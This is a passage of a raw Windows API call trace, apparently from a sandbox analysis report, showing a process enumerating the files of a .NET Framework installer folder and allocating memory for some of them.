returned 1 [0158.824] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.825] lstrlenW (lpString="Rotate4.ico") returned 11 [0158.825] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xae) returned 0x6a3950 [0158.825] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0158.825] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.825] lstrlenW (lpString="Rotate5.ico") returned 11 [0158.825] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xae) returned 0x6a3a08 [0158.825] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0158.825] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.825] lstrlenW (lpString="Rotate6.ico") returned 11 [0158.825] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xae) returned 0x6a3ac0 [0158.825] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0158.825] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.825] lstrlenW (lpString="Rotate7.ico") returned 11 [0158.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xae) returned 0x6a3b78 [0158.826] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0158.826] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.826] lstrlenW (lpString="Rotate8.ico") returned 11 [0158.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xae) returned 0x6a3c30 [0158.826] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0158.826] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.826] lstrlenW (lpString="Save.ico") returned 8 [0158.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa8) returned 0x66e6e0 [0158.826] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0158.826] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.826] lstrlenW (lpString="Setup.ico") returned 9 [0158.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xaa) returned 0x6a3ce8 [0158.827] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0158.827] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.827] lstrlenW (lpString="stop.ico") returned 8 [0158.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa8) returned 0x66e790 [0158.827] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0158.827] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.827] lstrlenW (lpString="SysReqMet.ico") returned 13 [0158.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a1838 [0158.827] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0158.827] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.827] lstrlenW (lpString="SysReqNotMet.ico") returned 16 [0158.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb8) returned 0x6a1bf8 [0158.827] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0158.828] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.828] lstrlenW (lpString="warn.ico") returned 8 [0158.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa8) returned 0x66e840 [0158.828] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 0 [0158.828] FindClose (in: hFindFile=0x677eb0 | out: hFindFile=0x677eb0) returned 1 [0158.829] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.829] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0158.829] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.829] lstrlenW (lpString="header.bmp") returned 10 [0158.829] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9a) returned 0x6a3500 [0158.829] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x66ea7e00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0xad1384b, dwReserved0=0x0, dwReserved1=0x0, cFileName="netfx_Core.mzz", cAlternateFileName="NETFX_~1.MZZ")) returned 1 [0158.829] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.829] lstrlenW (lpString="netfx_Core.mzz") returned 14 [0158.829] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa2) returned 0x66e8f0 [0158.829] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0xc183da00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d0200, dwReserved0=0x0, dwReserved1=0x0, cFileName="netfx_Core_x64.msi", cAlternateFileName="NETFX_~1.MSI")) returned 1 [0158.829] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.829] lstrlenW (lpString="netfx_Core_x64.msi") returned 18 [0158.829] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x4c130c00, ftLastWriteTime.dwHighDateTime=0x1cac6d9, nFileSizeHigh=0x0, nFileSizeLow=0x11c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="netfx_Core_x86.msi", cAlternateFileName="NETFX_~2.MSI")) returned 1 [0158.829] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.829] lstrlenW (lpString="netfx_Core_x86.msi") returned 18 [0158.830] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7cd9415, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x29222c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="netfx_Extended.mzz", cAlternateFileName="NETFX_~2.MZZ")) returned 1 [0158.830] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.830] lstrlenW (lpString="netfx_Extended.mzz") returned 18 [0158.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xaa) returned 0x6a3da0 [0158.830] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="netfx_Extended_x64.msi", cAlternateFileName="NETFX_~3.MSI")) returned 1 [0158.830] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.830] lstrlenW (lpString="netfx_Extended_x64.msi") returned 22 [0158.830] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x0, dwReserved1=0x0, cFileName="netfx_Extended_x86.msi", cAlternateFileName="NETFX_~4.MSI")) returned 1 [0158.830] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.831] lstrlenW (lpString="netfx_Extended_x86.msi") returned 22 [0158.831] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="ParameterInfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0158.831] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.831] lstrlenW (lpString="ParameterInfo.xml") returned 17 [0158.831] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa8) returned 0x6a48d8 [0158.831] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200, dwReserved0=0x0, dwReserved1=0x0, cFileName="RGB9RAST_x64.msi", cAlternateFileName="RGB9RA~1.MSI")) returned 1 [0158.831] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.832] lstrlenW (lpString="RGB9RAST_x64.msi") returned 16 [0158.832] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x0, dwReserved1=0x0, cFileName="RGB9Rast_x86.msi", cAlternateFileName="RGB9RA~2.MSI")) returned 1 [0158.832] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.832] lstrlenW (lpString="RGB9Rast_x86.msi") returned 16 [0158.832] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0158.832] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.832] lstrlenW (lpString="Setup.exe") returned 9 [0158.832] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0158.832] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.832] lstrlenW (lpString="SetupEngine.dll") returned 15 [0158.832] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0158.832] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.832] lstrlenW (lpString="SetupUi.dll") returned 11 [0158.832] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupUi.xsd", cAlternateFileName="")) returned 1 [0158.832] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.832] lstrlenW (lpString="SetupUi.xsd") returned 11 [0158.833] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9c) returned 0x6a2b28 [0158.833] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0158.833] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.833] lstrlenW (lpString="SetupUtility.exe") returned 16 [0158.833] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x0, dwReserved1=0x0, cFileName="SplashScreen.bmp", cAlternateFileName="SPLASH~1.BMP")) returned 1 [0158.833] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.833] lstrlenW (lpString="SplashScreen.bmp") returned 16 [0158.834] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x6a4358 [0158.834] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0158.834] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.834] lstrlenW (lpString="sqmapi.dll") returned 10 [0158.834] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704, dwReserved0=0x0, dwReserved1=0x0, cFileName="Strings.xml", cAlternateFileName="")) returned 1 [0158.834] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.834] lstrlenW (lpString="Strings.xml") returned 11 [0158.834] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9c) returned 0x6a35a8 [0158.834] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0158.834] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.834] lstrlenW (lpString="UiInfo.xml") returned 10 [0158.834] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9a) returned 0x6a2dc8 [0158.835] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688, dwReserved0=0x0, dwReserved1=0x0, cFileName="watermark.bmp", cAlternateFileName="WATERM~1.BMP")) returned 1 [0158.835] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.835] lstrlenW (lpString="watermark.bmp") returned 13 [0158.835] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a2690 [0158.835] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0158.835] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.835] lstrlenW (lpString="Windows6.0-KB956250-v6001-x64.msu") returned 33 [0158.835] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0158.835] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.835] lstrlenW (lpString="Windows6.0-KB956250-v6001-x86.msu") returned 33 [0158.835] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0158.835] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.835] lstrlenW (lpString="Windows6.1-KB958488-v6001-x64.msu") returned 33 [0158.835] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, 